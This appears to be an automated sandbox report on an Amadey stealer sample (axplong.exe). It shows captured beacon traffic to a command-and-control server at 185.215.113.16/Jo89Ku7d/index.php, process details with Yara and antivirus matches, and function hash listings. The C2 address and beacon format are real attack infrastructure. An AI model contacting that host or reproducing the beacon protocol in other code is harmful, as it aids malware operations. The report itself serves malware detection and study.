                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:02.682892084 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.749761185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:02.793092966 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:03.504374981 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.749762185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:03.515361071 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:04.228378057 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.749763185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:04.339654922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:05.059338093 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.749764185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:05.133985996 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:05.786137104 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.749765185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:05.902647972 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:06.623245001 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.749766185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:06.631886005 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:07.335659027 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.749767185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:07.594947100 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:08.331073046 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.749768185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:08.339634895 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:09.146142006 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.749769185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:09.261218071 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:10.735990047 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:10.736929893 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:10.738190889 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.749770185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:10.746455908 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:11.497175932 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.749771185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:11.622029066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:12.326397896 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.749772185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:12.335261106 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:13.056163073 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    66192.168.2.749773185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:13.173177004 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:13.871176004 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    67192.168.2.749774185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:30:13.880822897 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:14.618988037 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:19:28:09
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x3c0000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1358005555.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1398782734.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:19:28:11
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x790000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1424184795.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1383917764.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 58%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:4
                    Start time:19:29:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x790000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 04E50E64 Relevance: .0, Instructions: 31COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1402883782.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4e50000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d20ff0e2f6ba6465c7c3b2c9ec37d73a0b58c59593ddb232a0529abc127e6e2
                      • Instruction ID: b4859ce937f6b1b701a2df3407c70ffa4fdbbd2462289e6482d9ee47fb189453
                      • Opcode Fuzzy Hash: 9d20ff0e2f6ba6465c7c3b2c9ec37d73a0b58c59593ddb232a0529abc127e6e2
                      • Instruction Fuzzy Hash: 07E0C26B38C3049E9882A0C563512F13B1AEB6B3313306963F903CBF22B9DA25857526
                      Function 04E50E66 Relevance: .0, Instructions: 30COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1402883782.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4e50000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14a2c46a740a90cc81197f8742b1d184bc40355cf20dce107a19aafca5e3675e
                      • Instruction ID: 4688c1cf63a4c9afa935cd64b6c8ec43a0f5c43b98e74d2aee57b542774cef40
                      • Opcode Fuzzy Hash: 14a2c46a740a90cc81197f8742b1d184bc40355cf20dce107a19aafca5e3675e
                      • Instruction Fuzzy Hash: 22D0C26B28C3049E9882A0C553512F12B1AAB6B3303306963F903CBB22B9D925857525

                      Non-executed Functions

                      Function 04E502E5 Relevance: .1, Instructions: 139COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1402883782.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4e50000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6d6e8629dcd0cf99f0a8372dc5fd0741f7076da5748587a3b77c6906bd9e711
                      • Instruction ID: 133613d883dd6c83f41c605ffbfc1e9ab9fbf6425895a2919a7e6c643bd4c56f
                      • Opcode Fuzzy Hash: a6d6e8629dcd0cf99f0a8372dc5fd0741f7076da5748587a3b77c6906bd9e711
                      • Instruction Fuzzy Hash: B421D5EB38C111AEE10395996B14AF66B6EE7C33703306472F803DB563F2C16A496171

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:7.3%
                      Total number of Nodes:599
                      Total number of Limit Nodes:41
                      execution_graph 13758 7ab85e 13763 7ab6e5 13758->13763 13760 7ab886 13771 7ab648 13760->13771 13762 7ab89f 13764 7ab6f1 Concurrency::details::_Reschedule_chore 13763->13764 13765 7ab722 13764->13765 13781 7ac5dc 13764->13781 13765->13760 13769 7ab70c __Mtx_unlock 13770 792ad0 10 API calls 13769->13770 13770->13765 13772 7ab654 Concurrency::details::_Reschedule_chore 13771->13772 13773 7ab6ae 13772->13773 13774 7ac5dc GetSystemTimePreciseAsFileTime 13772->13774 13773->13762 13775 7ab669 13774->13775 13776 792ad0 10 API calls 13775->13776 13777 7ab66f __Mtx_unlock 13776->13777 13778 792ad0 10 API calls 13777->13778 13779 7ab68c __Cnd_broadcast 13778->13779 13779->13773 13780 792ad0 10 API calls 13779->13780 13780->13773 13789 7ac382 13781->13789 13783 7ab706 13784 792ad0 13783->13784 13785 792ada 13784->13785 13786 792adc 13784->13786 13785->13769 13806 7ac19a 13786->13806 13790 7ac3d8 13789->13790 13792 7ac3aa 13789->13792 13790->13792 13795 7ace9b 13790->13795 13792->13783 13793 7ac42d __Xtime_diff_to_millis2 13793->13792 13794 7ace9b _xtime_get GetSystemTimePreciseAsFileTime 13793->13794 13794->13793 13796 7aceaa 13795->13796 13797 7aceb7 __aulldvrm 13795->13797 13796->13797 13799 7ace74 13796->13799 13797->13793 13802 7acb1a 13799->13802 13803 7acb2b GetSystemTimePreciseAsFileTime 13802->13803 13805 7acb37 13802->13805 13803->13805 13805->13797 13807 7ac1c2 13806->13807 13809 7ac1a4 13806->13809 13807->13807 13809->13807 13810 7ac1c7 13809->13810 13813 792aa0 13810->13813 13812 7ac1de std::_Xinvalid_argument 13812->13809 13827 7abe0f 13813->13827 13815 792abf 13815->13812 13816 7c8aaf __fassign 4 API calls 13817 7c6c26 13816->13817 13819 7c6c35 13817->13819 13820 7c6c43 13817->13820 13818 792ab4 13818->13815 13818->13816 13821 7c6c99 9 API calls 13819->13821 13822 7c68bd 4 API calls 13820->13822 13823 7c6c3f 13821->13823 13824 7c6c5d 13822->13824 13823->13812 13825 7c6c99 9 API calls 13824->13825 13826 7c6c71 __freea 13824->13826 13825->13826 13826->13812 13830 7acb61 13827->13830 13831 7acb6f InitOnceExecuteOnce 13830->13831 13833 7abe22 13830->13833 13831->13833 13833->13818 14005 7c6559 14006 7c63f7 __fassign 2 API calls 14005->14006 14007 7c656a 14006->14007 14000 7c6974 14001 7c698c 14000->14001 14003 7c6982 14000->14003 14002 7c68bd 4 API calls 14001->14002 14004 7c69a6 __freea 14002->14004 13834 79e410 13835 79e435 13834->13835 13837 79e419 13834->13837 13837->13835 13838 79e270 13837->13838 13839 79e280 __dosmaperr 13838->13839 13840 7c8979 4 API calls 13839->13840 13842 79e2bd 